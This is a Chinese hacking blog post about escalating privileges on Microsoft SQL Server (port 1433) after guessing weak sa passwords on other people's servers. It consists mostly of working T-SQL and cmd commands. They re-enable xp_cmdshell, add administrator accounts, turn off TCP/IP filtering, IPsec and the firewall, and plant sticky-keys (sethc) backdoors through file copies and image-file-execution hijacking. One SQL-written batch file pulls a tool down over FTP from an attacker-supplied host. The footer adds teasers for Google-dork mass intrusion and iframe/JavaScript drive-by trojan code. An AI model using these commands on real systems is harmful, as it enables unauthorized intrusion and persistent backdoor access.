1433提权详细过程解读-中国寒龙

前段时间我朋友给我一个sopo的软件,说是扫1433口令的,而且猜解速度很快,我就找个服务器试了试,确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下1433错误的恢复和提权。(有人可能会说了,这有啥好研究的,sa的权限直接加用户到超管不就成了吗.其实在sa权限下还是有很多的问题的
大家可以捡有用的看 没用的就略过吧)

下面来说sa下执行命令错误的几种情况:

1、        无法装载DLL
xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。)

这种情况比较常见的,修复起来说简单也简单,但是有条件的。这种情况要是能列出目录(用sqltools
v2.0就有列目录功能)恭喜你这个有80%的情况能修复了,如果能列目录,那么只要找到xplog70.dll的路径执行以下命令就可以了。
第一步
exec
sp_dropextendedproc
‘xp_cmdshell‘  (这个命令就是删除原有的cmdshell,因为已经出错了)

第二步
dbcc
addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL
Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure   ‘show advanced
options‘, 0 –
当然这是sql命令,用查询分析器执行。第二步里的c:\Program Files\Microsoft SQL
Server\MSSQL\Binn\xplog70.dll就是xplog70.dll的路径,这个路径是比较常见的,如果c盘没有可以找找其他盘符。

2、 
      无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因:
127(找不到指定的程序。)

其实这个跟上面的126是一样的就是cmdshell出错了只要找到备份的xplog70.dll按照上面的方法就能修复了。

3、 
  
   未能找到存储过程‘master..xpcmdshell‘

这种情况我看到网上的方法是:
第一步先删除:
drop
procedure sp_addextendedproc
drop procedure sp_oacreate
exec
sp_dropextendedproc ‘xp_cmdshell‘

第二步恢复:
dbcc addextendedproc
("sp_oacreate","odsole70.dll")
dbcc addextendedproc
("xp_cmdshell","xplog70.dll")
其实这个跟上面的还是一样,其实如果细心的话,上面的126
127只执行第一步的时候就会出现未能找到存储过程‘master..xpcmdshell‘
因为第一步就是删除cmdshell的存储过程。所以这种情况下只执行上面的第二个步骤就可以了。

4.Error Message:SQL Server
阻止了对组件 ‘xp_cmdshell‘ 的 过程 ‘sys.xp_cmdshell‘
的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 ‘xp_cmdshell‘。有关启用
‘xp_cmdshell‘ 的详细信息,请参阅 SQL Server 联机丛书中的
"外围应用配置器"。

这种情况是最简单的了,因为什么都不用考虑,直接执行以下命令就可以了

;EXEC sp_configure
‘show advanced options‘, 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC
sp_configure ‘xp_cmdshell‘, 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC
sp_configure   ‘show advanced options‘, 0


经过上面的修复能够执行cmd命令了,下面就要开始提权了。我一般都是ipconfig先查下ip看看是不是内网,然后REG query
HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v
PortNumber查看一下终端端口,再netstat –an看看终端是否打开 然后net user 用户 密码 /add 加个用户 再net
localgroup administrators 用户
/add一切顺利的话,这就拿下一个服务器了。但是在这个过程中还会遇到很多问题。

1、    
   net提权成功但是连接不上终端有下面几种情况
(1)、服务器在内网。
(2)、做了tcp/ip筛选。
先执行下面cmd命令:
cmd
/c regedit -e c:\1.reg
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip,导出注册表里关于TCP/IP筛选的第一处
cmd
/c regedit -e c:\2.reg
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip,导出注册表里关于TCP/IP筛选的第二处
cmd
/c regedit -e c:\3.reg
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip",导出注册表里关于TCP/IP筛选的第三处
然后回到c盘1.reg,2.reg,3.reg,把1.reg,2.reg,3.reg下载回来到自己的硬盘里面编辑一下,找到EnableSecurityFilters这个
字段看看dword后面的键值是否为00000000,如果为00000001就说明管理员做了tcp/ip筛选,我们只要把1改成0就行了,2.reg和3.reg进行一样的修改。
(3)、做了ip安全策略。
执行cmd命令:
cmd /c net stop policyagent 将IPSEC
Services服务停了它。再连终端。
(4)、管理员设置的终端登陆权限只有指定的用户可以。
(5)、防火墙。  执行cmd命令:  net
stop alg /y                net
stop sharedaccess

2、net提权出现 拒绝访问

可以尝试一下net1 user 用户 密码 /add
如果net1也是拒绝访问可以copy一个shfit后门试试执行cmd命令:copy c:\windows\explorer.exe
c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe
c:\windows\system32\dllcache\sethc.exe
如果提示 复制1文件
哪么证明成功了。连接终端然后按5下shift看看蹦出来了什么。玩咔咔 资源管理器,现在只要手工加个用户就好了。

3、 
      net提权出现 拒绝访问错误5
(重点)

这种情况就不用尝试net1了,可以试试copy
shift后门,如果copy后提示复制0文件,证明没有成功。那么可以试试能不能上传,如果能上传直接传个前段时间出来的无net提权工具,然后加个用户就可以了。但是这种情况大部分都是不能上传的,那么就要考虑一下了。既然能执行cmd,那么就能通过cmd下ftp下载文件,可是ftp前提是要能写进文本或批处理。那么就可以通过sql语句写进一个文本或批处理啊。

declare
@o int, @f int, @t int, @ret int
exec sp_oacreate
‘scripting.filesystemobject‘, @o out
exec sp_oamethod @o, ‘createtextfile‘,
@f out, ‘C:\1.bat‘, 1
exec @ret = sp_oamethod @f, ‘writeline‘, NULL,‘open
IP‘
exec @ret = sp_oamethod @f, ‘writeline‘, NULL,‘ftp账号‘
exec @ret =
sp_oamethod @f, ‘writeline‘, NULL,‘ftp密码‘
exec @ret = sp_oamethod @f,
‘writeline‘, NULL,‘get en.exe(无net提权脚本)c:\en.exe‘
exec @ret = sp_oamethod @f,
‘writeline‘,
NULL,‘bye‘

查询分析器执行成功后,不出意外,会在c盘出现一个1.bat(如果执行成功了,c盘却没有,可以换个文件夹写入,因为哪个服务器c盘根目录禁止写入)
然后cmd执行ftp
-s:c:\1.bat
这个执行完了以后,就会在c盘ftp下载一个无net提权脚本 或者直接写个vbs提权脚本

declare @o
int, @f int, @t int, @ret int
exec sp_oacreate ‘scripting.filesystemobject‘,
@o out
exec sp_oamethod @o, ‘createtextfile‘, @f out, ‘c:\1.vbs‘, 1
exec
@ret = sp_oamethod @f, ‘writeline‘, NULL,‘Set  o=CreateObject(
"Shell.Users" )‘
exec @ret = sp_oamethod @f, ‘writeline‘, NULL,‘Set
z=o.create("用户")‘
exec @ret = sp_oamethod @f, ‘writeline‘,
NULL,‘z.changePassword "密码",""‘
exec @ret = sp_oamethod @f, ‘writeline‘,
NULL,‘z.setting("AccountType")=3‘
然后cmd执行cscript c:\1.vbs
就可以了

4、    
   前面说的是修复成功能执行cmd命令的,但是有的修复后,又会出现新的问题

(1)、Message:在执行
xp_cmdshell 的过程中出错。调用 ‘CreateProcess‘ 失败,错误代码:
‘5‘。

错误5是个系统提示的错误号,CreateProcess这个是创建线程的意思,这个错误产生和系统文件cmd.exe有很大的关系,一种情况是cmd被删除,一种是cmd的权限被降低了.
SQL查看终端端口及开放情况:
exec
master..xp_regread
‘HKEY_LOCAL_MACHINE‘,‘SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp‘,‘PortNumber‘
好了,下面关键的地方了,要用到两条sql指令,将系统的explorer文件复制为系统的shift后门文件,下面两条语句为分别执行的。

这条语句将explorer.exe复制为sethc.exe

declare
@o int exec sp_oacreate ‘scripting.filesystemobject‘, @o out exec sp_oamethod
@o,
‘copyfile‘,null,‘c:\windows\explorer.exe‘,‘c:\windows\system32\sethc.exe‘;

这条语句将sethc.exe复制到dllcache目录下

declare
@oo int exec sp_oacreate ‘scripting.filesystemobject‘, @oo out exec sp_oamethod
@oo,
‘copyfile‘,null,‘c:\windows\system32\sethc.exe‘,‘c:\windows\system32\dllcache\sethc.exe‘;

另外这两条语句使用到的sp_oacreate存储过程需要使用到odsole70.dll这个文件,所以这个文件的存亡,关系到创建的成功与否。

(2)、xpsql.cpp:
错误 5 来自 CreateProcess(第 737 行)

这种情况就是比较棘手的了,网上说这种情况

EXEC
master.dbo.xp_regwrite
‘HKEY_LOCAL_MACHINE‘,‘SoftWare\Microsoft\Jet\4.0\Engines‘,‘SandBoxMode‘,‘REG_DWORD‘,0
Select
* From
OpenRowSet(‘Microsoft.Jet.OLEDB.4.0‘,‘;Database=c:\windows\system32\ias\ias.mdb‘,‘select
shell("net user 123 123 /add")‘);
Select * From
OpenRowSet(‘Microsoft.Jet.OLEDB.4.0‘,‘;Database=c:\windows\system32\ias\ias.mdb‘,‘select
shell("net localgroup administrators 123
/add")‘);

这样直接加用户就成了,我查了查这个事利用的沙盘提权,但是通过我的实践,这个成功率很低,因为大部分的服务器都把c:\windows\system32\ias\ias.mdb给删掉了。那么可以试试映像劫持sethc,当然映像劫持也是有条件的,1
要存在xp_regwrite这个存储过程 2 就是‘HKEY_LOCAL_MACHINE‘,‘SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution
Options\sethc.exe‘,‘Debugger‘这个键值没有被删

可以先sql命令查询一下注册表粘滞键是否被劫持

exec
master..xp_regread ‘HKEY_LOCAL_MACHINE‘,‘SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution
Options\sethc.exe‘,‘Debugger‘

如果提示没有找到问题,证明被删了,没有办法了,如果提示sethc.exe
执行sql命令

EXEC
master..xp_regwrite
@rootkey=‘HKEY_LOCAL_MACHINE‘,
@key=‘SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution
Options\sethc.EXE‘,
@value_name=‘Debugger‘,
@type=‘REG_SZ‘,
@value=‘C:\WINDOWS\explorer.exe‘

连接终端5下shift后直接进入桌面了,然后手工添加。

时间: 2024-08-17 23:28:10

1433提权详细过程解读-中国寒龙的相关文章

利用谷歌实现批量入侵的方法 -中国寒龙

route print 查看本机设置网络 intext:这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:动网.将返回所有在网页正文部分包含"动网"的网页.allintext:使用方法和intext类似. intitle: 和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:安全天使.将返回所有网页标题中包含"安全天使"的网页.同理allintitle:也同intitle类似. ca

网页挂马大全集 -中国寒龙出品 转载写明出处www.hackerschina.org

一:框架挂马<iframe src=地址 width=0 height=0></iframe>二:js文件挂马首先将以下代码document.write("<iframe width='0' height='0' src='地址'></iframe>");保存为xxx.js,则JS挂马代码为<script language=javascript src=xxx.js></script>三:js变形加密<SCR

中国寒龙反网络病毒联盟官网www.hackerschina.org更新公告。社工库更新公告。

大家好欢迎使用中国寒龙反网络病毒联盟在线平台. 本平台为国际公益网站SEC平台 在这里本站近期更新的社工库包括:天涯数据 乌云网会员数据 南宫数据 中南股份数据 QQ数据 和某住址社工MM数据 以及个人数据  如果再本站搜索不到您想要的资料说明本站未曾更新您相关的数据资料 不过在此您对本站搜索关键字的使用需要有一定的技巧设置如:搜索 人名字  QQ号  手机号 身份证号等等产品序列号等等,本产品序列号和商家号只供搜索中南股份和南宫的数据.谢谢使用本站. 另外本站在年底期间将会升级服务器,,升级期

中国寒龙博客www.hackerschina.org:代码审计:PHP中is_numeric函数十六进制绕过BUG 发生的安全问题有哪些?

0×00 简介国内一部分CMS程序里面有用到过is_numberic函数,我们先看看这个函数的结构bool is_numeric ( mixed $var )如果 var 是数字和数字字符串则返回 TRUE,否则返回 FALSE. 0×01 函数是否安全接下来我们来看个例子,说明这个函数是否安全. $s = is_numeric($_GET['s'])?$_GET['s']:0; $sql="insert into test(type)values($s);";//是 values($

[中国寒龙联盟出品]C语言基础知识视频教程第一课-C语言简史,特点,基本结构,函数printf()和scanf()使用和c语言的开发过程。

本视频由中国寒龙收集整理发布,更多请关注我们的博客和,我们的官网:www.hackerschina.org  感谢朋友们的支持!

中国寒龙社工包v3.34 6.1升级版本已经发布 具体请到官网下载!!感谢支持!~~~~~不会升级的请到咱们交流群!本程序在windowsxp下最为兼容 感谢支持!如果有BUG请反馈!!

寒龙社会工程包:http://pan.baidu.com/s/1dDcilBb当你看到 中国寒龙V3.34 6.1版本的发布  那么本工具包将更强大的 展现了工具包的价值! 本次开发由by:寒龙升级  感谢大家支持 如果有各位小组的支持 本人不谢感激! 当然本站内的工具包 可以提供专门店小组工具包 制作!承接QQ群:94588528 本次手动升级  修复一下几点的不足! v3.33版本出现的  各种打不开的问题 v3.33版本中出现 主程序远控不能配置的问题 v3.33版本 部分 文件夹不能打开

webshell提权技巧 -中国寒龙出品 关注网络安全

web)权限终极9技巧 当我们取得一个webshell时候,下一部要做的就是提升权限个人总结如下:1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆2.C:\WINNT\system32\config\进这里下它的SAM,破解用户的密码用到破解sam密码的软件有LC,SAMinside3.C:\Doc

中国寒龙反网络病毒联盟官方荣誉出品 -对接 国外在线 聊天室 畅聊版本 对接全世界网络摄像头 随时随地聊不停,今天写的是教程欢迎访问!

教程请往下面看 上面是 聊天截图  嗯 主站聊天对接网进入口是:www.hackerschina.org大家好,我是寒龙很高兴与大家 共享本站平台  本站平台基于 世界版本在线聊天 !首先看教程!教程如下操作说明!首先点击:www.hackerschina.org 网站  然后点击[寒龙国际聊天]这个按钮!如图所示: 接下来等待几秒会进入对接页面:CR  我们 要点击  Start (F2) 这个按钮   这个按钮 点开以后 会看到  这个对话框Authorization Username是用户

编程类:计算机病毒的编写思考 原创:中国寒龙病毒联盟官网

如果你想好好的学习这门艺术 那么我将带您走进这未来的世界里来 ...今天刚刚开通了  博客 那么心情也是灰常不错的!好了 废话不多说  这里要讲到的是 常见的 感染类型的计算机病毒...呵呵只是空谈 如果大家有编程基础可以自己写的!计算机感染 可以通过 各种处理办法来达到目的 现在网上开源的源码也有许多  那么咱们就  如何编写计算机病毒一题开始讨论!如果编写呢?那么咱们将的 是批处理!因为批处理有很多好处 现在 咱们学到了 很多编程里运用的批处理方法 包括vb  vc vc++  E 以及 C